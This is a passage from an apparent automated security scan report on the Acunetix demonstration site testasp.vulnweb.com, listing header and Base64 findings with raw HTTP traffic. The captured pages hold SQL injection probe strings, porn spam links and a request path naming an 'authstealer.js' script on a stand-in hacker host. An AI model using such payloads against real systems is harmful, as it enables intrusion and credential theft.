http://gay.porn.porn.miyuhot.com/?amara allentown pa highschool porn ebony male porn biggest list of porn asian free videos porn free lesbian hot women porn video </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=4 |
| Method | POST |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=4 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=4 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:36 GMT Content-Length: 3073 |
| Response Body - size: 3,073 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="1" -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=40 |
| Method | POST |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=40 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:48 GMT Content-Length: 3426 |
| Response Body - size: 3,426 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>myrnaou3</b> on 3/14/2022 7:22:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn - 185.220.101.42</div><div class='posttext'>Hot galleries, daily updated collections http://dawnyangporn.momroleplayporn.adablog69.com/?martha indiana born porn star free female solo porn upload your amateur porn vids free porn bisexual videos step dads force girls porn </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=5 |
| Method | POST |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=5 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=5 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:36 GMT Content-Length: 3064 |
| Response Body - size: 3,064 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=1</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=6 |
| Method | POST |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=6 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=6 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:36 GMT Content-Length: 3068 |
| Response Body - size: 3,068 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='1</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=7 |
| Method | POST |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=7 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:37 GMT Content-Length: 3068 |
| Response Body - size: 3,068 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="1</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=8 |
| Method | POST |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=8 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=8 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:37 GMT Content-Length: 3057 |
| Response Body - size: 3,057 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=9 |
| Method | POST |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=9 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:37 GMT Content-Length: 3063 |
| Response Body - size: 3,063 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%' -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| Instances | 192 |
| Solution |
Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.
If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.
|
| Reference |
http://msdn.microsoft.com/en-us/library/ie/gg622941%28v=vs.85%29.aspx
https://owasp.org/www-community/Security_Headers |
| Tags |
OWASP_2021_A05
OWASP_2017_A06 |
| CWE Id | 693 |
| WASC Id | 15 |
| Plugin Id | 10021 |
|
Informational |
Base64 Disclosure |
|---|---|
| Description |
Base64 encoded data was disclosed by the application/web server. Note: in the interests of performance not all base64 strings in the response were analyzed individually, the entire response should be looked at by the analyst/security team/developer(s).
|
| URL | http://testasp.vulnweb.com/%C2%94http:/hackersite.com/authstealer.js%C2%94 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | org/TR/xhtml1/DTD/xhtml1-strict |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/%C2%94http:/hackersite.com/authstealer.js%C2%94 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=2 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 160 bytes. |
HTTP/1.1 404 Not Found
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 1245 |
| Response Body - size: 1,245 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>404 - File or directory not found.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/avatars/0 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | org/TR/xhtml1/DTD/xhtml1-strict |
| Request Header - size: 327 bytes. |
